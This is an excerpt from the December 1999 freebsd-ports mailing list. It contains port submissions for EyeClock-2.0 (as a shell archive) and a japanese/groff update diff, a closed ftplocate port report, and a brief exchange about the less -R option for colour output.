Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA20816; Fri, 24 Dec 1999 21:04:59 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 24 Dec 1999 21:04:59 -0800 (PST) From: Message-Id: <199912250504.VAA20816@freefall.freebsd.org> To: tung@turtle.ee.ncku.edu.tw, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15332: New port: ftp/ftplocate-1.50 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: ftp/ftplocate-1.50 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 24 21:01:37 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 24 22:11:31 1999 Delivered-To: freebsd-ports@freebsd.org Received: from venus.GAIANET.NET (venus.GAIANET.NET [207.211.200.51]) by hub.freebsd.org (Postfix) with ESMTP id 4FA0D14CCD for ; Fri, 24 Dec 1999 22:11:27 -0800 (PST) (envelope-from vince@venus.GAIANET.NET) Received: from localhost (vince@localhost) by venus.GAIANET.NET (8.9.3/8.9.3) with ESMTP id WAA63885 for ; Fri, 24 Dec 1999 22:11:18 -0800 (PST) (envelope-from vince@venus.GAIANET.NET) Date: Fri, 24 Dec 1999 22:11:17 -0800 (PST) From: Vincent Poy To: ports@FreeBSD.ORG Subject: less port supporting colorls? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Greetings and Happy Holidays everyone, is there a version of the less port available that will handle colorls's colors properly? The 1997 port of less handled the codes fine as well as cless but not the current less port. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 2:44: 1 1999 Delivered-To: freebsd-ports@freebsd.org Received: from blues.jpj.net (blues.jpj.net [204.97.17.146]) by hub.freebsd.org (Postfix) with ESMTP id E1D5914FF9 for ; Sat, 25 Dec 1999 02:43:58 -0800 (PST) (envelope-from trevor@jpj.net) Received: from localhost (trevor@localhost) by blues.jpj.net (right/backatcha) with ESMTP id FAA15011; Sat, 25 Dec 1999 05:43:56 -0500 (EST) Date: Sat, 25 Dec 1999 05:43:56 -0500 (EST) From: Trevor Johnson To: Vincent Poy Cc: ports@FreeBSD.ORG Subject: Re: less port supporting colorls? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Greetings and Happy Holidays everyone, Hi, Vince. > is there a version of the less port available that will handle > colorls's colors properly? The 1997 port of less handled the codes fine > as well as cless but not the current less port. Have you tried this option to "less"? -R or --RAW-CONTROL-CHARS Like -r, but tries to keep track of the screen appearance where possible. This works only if the input consists of normal text and possibly some ANSI "color" escape sequences, which are sequences [snip] __ Trevor Johnson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 2:50:13 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9683015044 for ; Sat, 25 Dec 1999 02:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA33683; Sat, 25 Dec 1999 02:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from miya7f09.ee.kagu.sut.ac.jp (miya7f09.ee.kagu.sut.ac.jp [133.31.55.68]) by hub.freebsd.org (Postfix) with ESMTP id 806A414EB7 for ; Sat, 25 Dec 1999 02:44:49 -0800 (PST) (envelope-from sakai@miya7f09.ee.kagu.sut.ac.jp) Received: (from sakai@localhost) by miya7f09.ee.kagu.sut.ac.jp (8.9.3/8.9.3) id TAA31298; Sat, 25 Dec 1999 19:44:46 +0900 (JST) (envelope-from sakai) Message-Id: <199912251044.TAA31298@miya7f09.ee.kagu.sut.ac.jp> Date: Sat, 25 Dec 1999 19:44:46 +0900 (JST) From: sakai@miya3f12.ee.kagu.sut.ac.jp Reply-To: sakai@miya3f12.ee.kagu.sut.ac.jp To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15681: New port of EyeClock-2.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15681 >Category: ports >Synopsis: Port of EyeClock-2.0 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Dec 25 02:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Hiroaki Sakai >Release: FreeBSD 3.3-RELEASE i386 >Organization: PFU >Environment: FreeBSD-2.x.x or FreeBSD-3.x XFree86 >Description: This is port of EyeClock-2.0. EyeClock-2.0 is different from EyeClock-1.x for all. * Eyes are pixmaps. (not circles) * Configured by X-Toolkit resources. * Many sample clocks were added. * Modified many many bugs. >How-To-Repeat: >Fix: Following lines is ports of EyeClock-2.0. # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # eyeclock # eyeclock/files # eyeclock/files/md5 # eyeclock/patches # eyeclock/patches/patch-aa # eyeclock/pkg # eyeclock/pkg/PLIST # eyeclock/pkg/DESCR # eyeclock/pkg/COMMENT # eyeclock/Makefile # echo c - eyeclock mkdir -p eyeclock > /dev/null 2>&1 echo c - eyeclock/files mkdir -p eyeclock/files > /dev/null 2>&1 echo x - eyeclock/files/md5 sed 's/^X//' >eyeclock/files/md5 << 'END-of-eyeclock/files/md5' XMD5 (eyeclock-2.0.tar.gz) = bd2a6c70c9a13cb80efd7893ece4acbf END-of-eyeclock/files/md5 echo c - eyeclock/patches mkdir -p eyeclock/patches > /dev/null 2>&1 echo x - eyeclock/patches/patch-aa sed 's/^X//' >eyeclock/patches/patch-aa << 'END-of-eyeclock/patches/patch-aa' X*** Makefile~ Sun Dec 19 13:04:26 1999 X--- Makefile Sun Dec 19 13:09:13 1999 X*************** X*** 15,22 **** X ############################################################################### X X #PREFIX = /usr/local X! PREFIX = /usr/X11R6 X! X11BASE = /usr/X11R6 X BINDIR = ${PREFIX}/bin X LIBDIR = ${PREFIX}/lib/X11/EyeClock X RESDIR = ${PREFIX}/lib/X11/app-defaults X--- 15,22 ---- X ############################################################################### X X #PREFIX = /usr/local X! #PREFIX = /usr/X11R6 X! #X11BASE = /usr/X11R6 X BINDIR = ${PREFIX}/bin X LIBDIR = ${PREFIX}/lib/X11/EyeClock X RESDIR = ${PREFIX}/lib/X11/app-defaults X*************** VERSION = EyeClock-2.0 X*** 26,40 **** X X # Choose a default face from below lines. X X! #DEFAULT_FACE = DEFAULT_FACE_IS_BSD_DAEMON X #DEFAULT_FACE = DEFAULT_FACE_IS_PENGUIN X! DEFAULT_FACE = DEFAULT_FACE_IS_NORMAL X X # Choose a default resource file from below lines. X X! #DEFAULT_RESOURCE = EyeClock.daemon X #DEFAULT_RESOURCE = EyeClock.penguin X! DEFAULT_RESOURCE = EyeClock.normal X X # Choose icon pixmap from below lines. X X--- 26,40 ---- X X # Choose a default face from below lines. X X! DEFAULT_FACE = DEFAULT_FACE_IS_BSD_DAEMON X #DEFAULT_FACE = DEFAULT_FACE_IS_PENGUIN X! #DEFAULT_FACE = DEFAULT_FACE_IS_NORMAL X X # Choose a default resource file from below lines. X X! DEFAULT_RESOURCE = EyeClock.daemon X #DEFAULT_RESOURCE = EyeClock.penguin X! #DEFAULT_RESOURCE = EyeClock.normal X X # Choose icon pixmap from below lines. X X*************** clean : X*** 93,106 **** X backup : X cp COPYRIGHT* *.jpn CHANGE EyeClock* Makefile *.h *.c *.man bak X X! makeclock : eyeclock daemonclock penguinclock umeharaclock taroclock boyclock girlclock henohenoclock silicagelclock punpunclock margueriteclock octopusclock X X daemonclock : X ln -s eyeclock daemonclock X X! penguinclock : X! ln -s eyeclock penguinclock X! X umeharaclock : X ln -s eyeclock umeharaclock X X--- 93,107 ---- X backup : X cp COPYRIGHT* *.jpn CHANGE EyeClock* Makefile *.h *.c *.man bak X X! #makeclock : eyeclock daemonclock penguinclock umeharaclock taroclock boyclock girlclock henohenoclock silicagelclock punpunclock margueriteclock octopusclock X! makeclock : eyeclock daemonclock umeharaclock taroclock boyclock girlclock henohenoclock silicagelclock punpunclock margueriteclock octopusclock X X daemonclock : X ln -s eyeclock daemonclock X X! #penguinclock : X! # ln -s eyeclock penguinclock X! # X umeharaclock : X ln -s eyeclock umeharaclock X X*************** octopusclock : X*** 131,137 **** X clearclock : X rm -f ${BINDIR}/eyeclock X rm -f ${BINDIR}/daemonclock X! rm -f ${BINDIR}/penguinclock X rm -f ${BINDIR}/umeharaclock X rm -f ${BINDIR}/taroclock X rm -f ${BINDIR}/boyclock X--- 132,138 ---- X clearclock : X rm -f ${BINDIR}/eyeclock X rm -f ${BINDIR}/daemonclock X! # rm -f ${BINDIR}/penguinclock X rm -f ${BINDIR}/umeharaclock X rm -f ${BINDIR}/taroclock X rm -f ${BINDIR}/boyclock END-of-eyeclock/patches/patch-aa echo c - eyeclock/pkg mkdir -p eyeclock/pkg > /dev/null 2>&1 echo x - eyeclock/pkg/PLIST sed 's/^X//' >eyeclock/pkg/PLIST << 'END-of-eyeclock/pkg/PLIST' Xbin/boyclock Xbin/daemonclock Xbin/eyeclock Xbin/girlclock Xbin/henohenoclock Xbin/margueriteclock Xbin/octopusclock Xbin/punpunclock Xbin/silicagelclock Xbin/taroclock Xbin/umeharaclock Xlib/X11/EyeClock/CHANGE Xlib/X11/EyeClock/COPYRIGHT Xlib/X11/EyeClock/EyeClock.daemon Xlib/X11/EyeClock/EyeClock.normal Xlib/X11/EyeClock/EyeClock.penguin Xlib/X11/EyeClock/Makefile Xlib/X11/EyeClock/OMAKE.jpn Xlib/X11/EyeClock/README.jpn Xlib/X11/EyeClock/angry_left_eye.xpm Xlib/X11/EyeClock/angry_right_eye.xpm Xlib/X11/EyeClock/boy_face.xpm Xlib/X11/EyeClock/boy_left_core.xpm Xlib/X11/EyeClock/boy_left_eye.xpm Xlib/X11/EyeClock/boy_right_core.xpm Xlib/X11/EyeClock/boy_right_eye.xpm Xlib/X11/EyeClock/daemon_face.xpm Xlib/X11/EyeClock/daemon_icon_face.xpm Xlib/X11/EyeClock/daemon_left_eye.xpm Xlib/X11/EyeClock/daemon_right_eye.xpm Xlib/X11/EyeClock/default_icon_face.xpm Xlib/X11/EyeClock/default_left_core.xpm Xlib/X11/EyeClock/default_right_core.xpm Xlib/X11/EyeClock/girl_face.xpm Xlib/X11/EyeClock/girl_left_core.xpm Xlib/X11/EyeClock/girl_left_eye.xpm Xlib/X11/EyeClock/girl_right_core.xpm Xlib/X11/EyeClock/girl_right_eye.xpm Xlib/X11/EyeClock/henoheno_face.xpm Xlib/X11/EyeClock/henoheno_left_core.xpm Xlib/X11/EyeClock/henoheno_right_core.xpm Xlib/X11/EyeClock/marguerite_face.xpm Xlib/X11/EyeClock/marguerite_left_core.xpm Xlib/X11/EyeClock/marguerite_left_eye.xpm Xlib/X11/EyeClock/marguerite_right_core.xpm Xlib/X11/EyeClock/marguerite_right_eye.xpm Xlib/X11/EyeClock/number_01.xpm Xlib/X11/EyeClock/number_02.xpm Xlib/X11/EyeClock/number_03.xpm Xlib/X11/EyeClock/number_04.xpm Xlib/X11/EyeClock/number_05.xpm Xlib/X11/EyeClock/number_06.xpm Xlib/X11/EyeClock/number_07.xpm Xlib/X11/EyeClock/number_08.xpm Xlib/X11/EyeClock/number_09.xpm Xlib/X11/EyeClock/number_10.xpm Xlib/X11/EyeClock/number_11.xpm Xlib/X11/EyeClock/number_12.xpm Xlib/X11/EyeClock/number_big.xpm Xlib/X11/EyeClock/number_needle_00.xpm Xlib/X11/EyeClock/number_needle_01.xpm Xlib/X11/EyeClock/number_needle_02.xpm Xlib/X11/EyeClock/number_needle_03.xpm Xlib/X11/EyeClock/number_needle_04.xpm Xlib/X11/EyeClock/number_needle_05.xpm Xlib/X11/EyeClock/number_r01.xpm Xlib/X11/EyeClock/number_r02.xpm Xlib/X11/EyeClock/number_r03.xpm Xlib/X11/EyeClock/number_r04.xpm Xlib/X11/EyeClock/number_r05.xpm Xlib/X11/EyeClock/number_r06.xpm Xlib/X11/EyeClock/number_r07.xpm Xlib/X11/EyeClock/number_r08.xpm Xlib/X11/EyeClock/number_r09.xpm Xlib/X11/EyeClock/number_r10.xpm Xlib/X11/EyeClock/number_r11.xpm Xlib/X11/EyeClock/number_r12.xpm Xlib/X11/EyeClock/number_small.xpm Xlib/X11/EyeClock/octopus_face.xpm Xlib/X11/EyeClock/octopus_left_core.xpm Xlib/X11/EyeClock/octopus_left_eye.xpm Xlib/X11/EyeClock/octopus_right_core.xpm Xlib/X11/EyeClock/octopus_right_eye.xpm Xlib/X11/EyeClock/penguin_face.xpm Xlib/X11/EyeClock/penguin_left_eye.xpm Xlib/X11/EyeClock/penguin_right_eye.xpm Xlib/X11/EyeClock/silicagel_face.xpm Xlib/X11/EyeClock/silicagel_left_core.xpm Xlib/X11/EyeClock/silicagel_left_eye.xpm Xlib/X11/EyeClock/silicagel_right_core.xpm Xlib/X11/EyeClock/silicagel_right_eye.xpm Xlib/X11/EyeClock/taro_face.xpm Xlib/X11/EyeClock/taro_left_core.xpm Xlib/X11/EyeClock/taro_left_eye.xpm Xlib/X11/EyeClock/taro_right_core.xpm Xlib/X11/EyeClock/taro_right_eye.xpm Xlib/X11/app-defaults/EyeClock X@dirrm lib/X11/EyeClock END-of-eyeclock/pkg/PLIST echo x - eyeclock/pkg/DESCR sed 's/^X//' >eyeclock/pkg/DESCR << 'END-of-eyeclock/pkg/DESCR' XEyeClock is a simple clock application for X11. You can put your favorite Xpicture on the face of the clock. And you can move the eyes of the Xpicture following the mouse pointer. XSee /usr/X11R6/lib/X11/EyeClock/README.jpn for more details. X XThis port installs below clocks. Xboyclock, daemonclock, eyeclock, girlclock, henohenoclock, Xmargueriteclock, octopusclock, punpunclock, silicagelclock, Xtaroclock, umeharaclock. X XWWW: http://www.seki.ee.kagu.sut.ac.jp/~sakai/myfreesoft.html X X- Sakai Hiroaki Xsakai@seki.ee.kagu.sut.ac.jp END-of-eyeclock/pkg/DESCR echo x - eyeclock/pkg/COMMENT sed 's/^X//' >eyeclock/pkg/COMMENT << 'END-of-eyeclock/pkg/COMMENT' XEyeClock (DaemonClock) - A clock with eyes following the mouse pointer. END-of-eyeclock/pkg/COMMENT echo x - eyeclock/Makefile sed 's/^X//' >eyeclock/Makefile << 'END-of-eyeclock/Makefile' X# New ports collection makefile for: EyeClock X# Version required: 2.0 X# Date created: 24 December 1999 X# Whom: Sakai Hiroaki X# X# $FreeBSD$ X# X XDISTNAME= eyeclock-2.0 XCATEGORIES= x11-clocks XMASTER_SITES= http://www.seki.ee.kagu.sut.ac.jp/~sakai/ XMAINTAINER= sakai@seki.ee.kagu.sut.ac.jp X XLIB_DEPENDS= Xpm.4:${PORTSDIR}/graphics/xpm X XALL_TARGET= all X XUSE_X_PREFIX= yes X XMAN1= eyeclock.1 XMANCOMPRESSED= yes X X.include END-of-eyeclock/Makefile exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 2:53:28 1999 Delivered-To: freebsd-ports@freebsd.org Received: from venus.GAIANET.NET (venus.GAIANET.NET [207.211.200.51]) by hub.freebsd.org (Postfix) with ESMTP id 7D9EF14E4F for ; Sat, 25 Dec 1999 02:53:25 -0800 (PST) (envelope-from vince@venus.GAIANET.NET) Received: from localhost (vince@localhost) by venus.GAIANET.NET (8.9.3/8.9.3) with ESMTP id CAA73100; Sat, 25 Dec 1999 02:53:24 -0800 (PST) (envelope-from vince@venus.GAIANET.NET) Date: Sat, 25 Dec 1999 02:53:24 -0800 (PST) From: Vincent Poy To: Trevor Johnson Cc: ports@FreeBSD.ORG Subject: Re: less port supporting colorls? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 25 Dec 1999, Trevor Johnson wrote: Hi Trevor, > > Greetings and Happy Holidays everyone, > > Hi, Vince. > > > is there a version of the less port available that will handle > > colorls's colors properly? The 1997 port of less handled the codes fine > > as well as cless but not the current less port. > > Have you tried this option to "less"? > > -R or --RAW-CONTROL-CHARS > Like -r, but tries to keep track of the screen > appearance where possible. This works only if the > input consists of normal text and possibly some > ANSI "color" escape sequences, which are sequences Yeah, I saw that option right after I posted the message.. Thanks! Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 25 4: 0:21 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0B81A1502E for ; Sat, 25 Dec 1999 04:00:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id EAA36891; Sat, 25 Dec 1999 04:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from mailgw1.be.to (mailgw1.be.to [210.235.212.5]) by hub.freebsd.org (Postfix) with ESMTP id AD545150B3 for ; Sat, 25 Dec 1999 03:58:32 -0800 (PST) (envelope-from okazaki@be.to) Received: from mail1.be.to (point1.be.to [210.235.212.29]) by mailgw1.be.to (8.9.3+3.2W/BETO.2.1-1999122115000035) with ESMTP id UAA21923 for ; Sat, 25 Dec 1999 20:58:30 +0900 Received: from acidrain (ppp04-Mobara1.mtci.ne.jp [210.172.1.206]) by mail1.be.to (8.8.8+3.0Wbeta13/BETO.2.0-1999110714000000) with SMTP id UAA17169 for ; Sat, 25 Dec 1999 20:58:25 +0900 Received: (qmail 5574 invoked by uid 1001); 25 Dec 1999 11:55:47 -0000 Message-Id: <19991225115547.5573.qmail@dolphin.be.to> Date: 25 Dec 1999 11:55:47 -0000 From: okazaki@be.to Reply-To: okazaki@be.to To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15682: [update] japanese/groff to 0.99.1.1 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15682 >Category: ports >Synopsis: [update] japanese/groff to 0.99.1.1 >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Dec 25 04:00:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: OKAZAKI Tetsurou >Release: FreeBSD 3.4-STABLE i386 >Organization: jpman Project >Environment: FreeBSD 3.4-STABLE #1: Fri Dec 24 14:01:26 JST 1999 gcc 2.95.2 from ports-current >Description: Up to date GNU C++ can't build japanese/groff successfully. This is a problem to users of -CURRENT. We(jpman Project) tried to contact with the maintainer but have no reply yet. >How-To-Repeat: % cd /usr/ports/japanese/groff % make USE_NEWGCC=yes build >Fix: Please apply the following patch, thanks. Change-Log: o update the base version of GNU groff to 1.11.1 o update PATCH_SITES and PATCH_FILES too o change MAINTAINER to me (approved by Horikawa-san , the director of jpman: FreeBSD Japanese Manual Project) o use MANx and MANCOMPRESSED variable o use PATCH instead of /usr/bin/patch o sort PLIST o New file: patches/patch-ae Most of the work of this fix was done by the force of Kentaro Inagaki , thanks! diff -urN /usr/ports/japanese/groff/Makefile groff/Makefile --- /usr/ports/japanese/groff/Makefile Tue Sep 21 05:26:35 1999 +++ groff/Makefile Sat Dec 25 15:36:54 1999 @@ -1,36 +1,54 @@ # New ports collection makefile for: ja-groff -# Version required: 1.10+0.99 +# Version required: 1.11.1+0.99.1 # Date created: 14 April 1995 # Whom: Nobuhiro Yasutomi # # $FreeBSD: ports/japanese/groff/Makefile,v 1.18 1999/09/20 09:07:09 asami Exp $ # -DISTNAME= groff-1.10 -PKGNAME= ja-groff-0.99 +DISTNAME= groff-1.11.1 +PKGNAME= ja-groff-0.99.1.1 CATEGORIES= japanese print MASTER_SITES= ${MASTER_SITE_GNU} MASTER_SITE_SUBDIR= groff -PATCH_SITES= ftp://ftp.ae.keio.ac.jp/pub/GNU/ \ - ftp://ftp.tohoku.ac.jp/pub/GNU/japanese/ -PATCHFILES= jgroff-0.99.diff.gz +PATCH_SITES= ${MASTER_SITE_PORTS_JP} \ + http://www.tg.rim.or.jp/~inagaki/ +PATCHFILES= jgroff-0.99.1.diff.gz jgroff-0.99.1-0.99.1.1.diff.gz PATCH_DIST_STRIP= -p1 -MAINTAINER= graphite@jp.freebsd.org +MAINTAINER= okazaki@be.to USE_GMAKE= yes GNU_CONFIGURE= yes +CONFIGURE_ARGS= --program-prefix=g +CONFIGURE_ENV= INSTALL="${INSTALL}" \ + INSTALL_PROGRAM="${INSTALL_PROGRAM}" \ + INSTALL_SCRIPT="${INSTALL_SCRIPT}" \ + INSTALL_DATA="${INSTALL_DATA}" INSTALL_MAN="${INSTALL_MAN}" + DESCS= ${WRKSRC}/devnippon/DESC.proto ${WRKSRC}/devps/DESC.in +MAN1= groff.1 gtroff.1 gtbl.1 gpic.1 geqn.1 grops.1 grotty.1 \ + grodvi.1 tfmtodit.1 grolj4.1 hpftodit.1 grefer.1 glookbib.1 \ + gindxbib.1 lkbib.1 gsoelim.1 addftinfo.1 pfbtops.1 psbb.1 \ + afmtodit.1 grog.1 gnroff.1 +MAN5= groff_font.5 groff_out.5 +MAN7= me.7 msafer.7 groff_char.7 groff_mm.7 groff_mmse.7 groff_ms.7 +MANCOMPRESSED= yes + +post-extract: + @${RM} ${WRKSRC}/config.cache + @${RM} ${WRKSRC}/config.log + #for not writing "/usr/local" explicitly in the patch post-patch: @for f in ${DESCS}; do \ ${MV} -f $${f} $${f}.tmp; \ ${SED} -e '$$d' $${f}.tmp > $${f}; \ case $${f} in \ - */devnippon/*) \ + */devnippon/*) \ ${ECHO} "postpro ${PREFIX}/bin/grotty" >> $${f}; \ ;; \ */devps/*) \ @@ -56,6 +74,6 @@ @${CP} -p /usr/share/tmac/troffrc ${PREFIX}/share/groff/tmac @${CP} -p /usr/share/tmac/mdoc/doc-common ${PREFIX}/share/groff/tmac/mdoc @${CP} -p /usr/share/tmac/mdoc/doc-syms ${PREFIX}/share/groff/tmac/mdoc - @/usr/bin/patch -d ${PREFIX}/share/groff/tmac < ${FILESDIR}/rc.diff + @${PATCH} -d ${PREFIX}/share/groff/tmac < ${FILESDIR}/rc.diff .include diff -urN /usr/ports/japanese/groff/files/md5 groff/files/md5 --- /usr/ports/japanese/groff/files/md5 Mon Apr 1 08:25:20 1996 +++ groff/files/md5 Sat Dec 25 14:10:18 1999 @@ -1,2 +1,3 @@ -MD5 (groff-1.10.tar.gz) = cc58a06abafe82ada7c02f0f2b2c8509 -MD5 (jgroff-0.99.diff.gz) = 0055c596a6cb641e3a8e844465e81623 +MD5 (groff-1.11.1.tar.gz) = d6769b8535b4e5d9bf9c0be3b6e3400e +MD5 (jgroff-0.99.1.diff.gz) = fa727d542b344adc02d208e33d34e00a +MD5 (jgroff-0.99.1-0.99.1.1.diff.gz) = 0351ce5a577b6da8470de8a25fa7354a diff -urN /usr/ports/japanese/groff/patches/patch-aa groff/patches/patch-aa --- /usr/ports/japanese/groff/patches/patch-aa Mon Apr 1 08:25:22 1996 +++ groff/patches/patch-aa Fri Dec 24 19:47:24 1999 @@ -54,68 +54,3 @@ echo rm -f $$target; \ rm -f $$target; \ done ---- afmtodit/Makefile.sub.orig Wed Oct 28 21:48:22 1992 -+++ afmtodit/Makefile.sub Tue Mar 26 22:38:08 1996 -@@ -15,7 +15,7 @@ - install_data: afmtodit - -test -d $(bindir) || mkdir $(bindir) - -rm -f $(bindir)/afmtodit -- $(INSTALL_PROGRAM) afmtodit $(bindir)/afmtodit -+ $(INSTALL) -m 555 afmtodit $(bindir)/afmtodit - - uninstall_sub: - -rm -f $(bindir)/afmtodit ---- eqn/Makefile.sub.orig Mon Apr 19 17:47:10 1993 -+++ eqn/Makefile.sub Tue Mar 26 22:39:26 1996 -@@ -21,7 +21,7 @@ - - install_data: neqn - -rm -f $(bindir)/$(NAMEPREFIX)neqn -- $(INSTALL_PROGRAM) neqn $(bindir)/$(NAMEPREFIX)neqn -+ $(INSTALL) -m 555 neqn $(bindir)/$(NAMEPREFIX)neqn - - uninstall_sub: - -rm -f $(bindir)/$(NAMEPREFIX)neqn ---- grog/Makefile.sub.orig Mon Apr 19 17:47:11 1993 -+++ grog/Makefile.sub Tue Mar 26 22:39:45 1996 -@@ -16,7 +16,7 @@ - install_data: grog - -test -d $(bindir) || mkdir $(bindir) - -rm -f $(bindir)/grog -- $(INSTALL_PROGRAM) grog $(bindir)/grog -+ $(INSTALL) -m 555 grog $(bindir)/grog - - uninstall_sub: - -rm -f $(bindir)/grog ---- nroff/Makefile.sub.orig Mon Apr 19 17:46:21 1993 -+++ nroff/Makefile.sub Tue Mar 26 22:40:10 1996 -@@ -11,7 +11,7 @@ - - install_data: nroff - -rm -f $(bindir)/$(NAMEPREFIX)nroff -- $(INSTALL_PROGRAM) nroff $(bindir)/$(NAMEPREFIX)nroff -+ $(INSTALL) -m 555 nroff $(bindir)/$(NAMEPREFIX)nroff - - uninstall_sub: - -rm -f $(bindir)/$(NAMEPREFIX)nroff ---- Makefile.in.orig Wed Mar 27 02:35:00 1996 -+++ Makefile.in Wed Mar 27 02:48:42 1996 -@@ -240,6 +240,7 @@ - "CCFLAGS=$(CCFLAGS)" "CFLAGS=$(CFLAGS)" "LDFLAGS=$(LDFLAGS)" \ - "YACC=$(YACC)" "YACCFLAGS=$(YACCFLAGS)" \ - "LIBS=$(LIBS)" "LIBOBJS=$(LIBOBJS)" "RANLIB=$(RANLIB)" "AR=$(AR)" \ -+ "INSTALL=$(INSTALL)" \ - "INSTALL_PROGRAM=$(INSTALL_PROGRAM)" "INSTALL_DATA=$(INSTALL_DATA)" \ - "ETAGS=$(ETAGS)" "ETAGSFLAGS=$(ETAGSFLAGS)" "ETAGSCCFLAG=$(ETAGSCCFLAG)" \ - "PERLPATH=$(PERLPATH)" "SH_SCRIPT_SED_CMD=$(SH_SCRIPT_SED_CMD)" \ ---- configure.orig Mon Nov 20 20:36:05 1995 -+++ configure Sat Mar 30 00:54:44 1996 -@@ -1904,7 +1904,7 @@ - g=g - else - echo "$ac_t""no" 1>&6 -- g= -+ g=g - fi - - diff -urN /usr/ports/japanese/groff/patches/patch-ae groff/patches/patch-ae --- /usr/ports/japanese/groff/patches/patch-ae Thu Jan 1 09:00:00 1970 +++ groff/patches/patch-ae Fri Dec 24 22:59:26 1999 @@ -0,0 +1,13 @@ +--- include/lib.h.orig Fri Dec 24 22:54:44 1999 ++++ include/lib.h Fri Dec 24 22:59:02 1999 +@@ -69,6 +69,10 @@ + + int interpret_lf_args(const char *p); + ++#ifdef NIPPON ++# include "eucmac.h" ++#endif ++ + extern char illegal_char_table[]; + + inline int illegal_input_char(int c) diff -urN /usr/ports/japanese/groff/pkg/PLIST groff/pkg/PLIST --- /usr/ports/japanese/groff/pkg/PLIST Thu Oct 1 02:49:22 1998 +++ groff/pkg/PLIST Sat Dec 25 13:57:53 1999 @@ -1,167 +1,32 @@ -bin/groff -bin/gtroff -bin/gtbl -bin/gpic +bin/addftinfo +bin/afmtodit bin/geqn +bin/gindxbib +bin/glookbib bin/gneqn -bin/grops -bin/grotty +bin/gnroff +bin/gpic +bin/grefer bin/grodvi -bin/tfmtodit +bin/groff +bin/grog bin/grolj4 +bin/grops +bin/grotty +bin/gsoelim +bin/gtbl +bin/gtroff bin/hpftodit -bin/grefer -bin/glookbib -bin/gindxbib bin/lkbib -bin/gsoelim -bin/addftinfo bin/pfbtops bin/psbb -bin/afmtodit -bin/grog -bin/gnroff -man/man1/groff.1.gz -man/man1/gtroff.1.gz -man/man1/gtbl.1.gz -man/man1/gpic.1.gz -man/man1/geqn.1.gz -man/man1/grops.1.gz -man/man1/grotty.1.gz -man/man1/grodvi.1.gz -man/man1/tfmtodit.1.gz -man/man1/grolj4.1.gz -man/man1/hpftodit.1.gz -man/man1/grefer.1.gz -man/man1/glookbib.1.gz -man/man1/gindxbib.1.gz -man/man1/lkbib.1.gz -man/man1/gsoelim.1.gz -man/man1/addftinfo.1.gz -man/man1/pfbtops.1.gz -man/man1/psbb.1.gz -man/man5/groff_font.5.gz -man/man5/groff_out.5.gz -man/man7/groff_char.7.gz 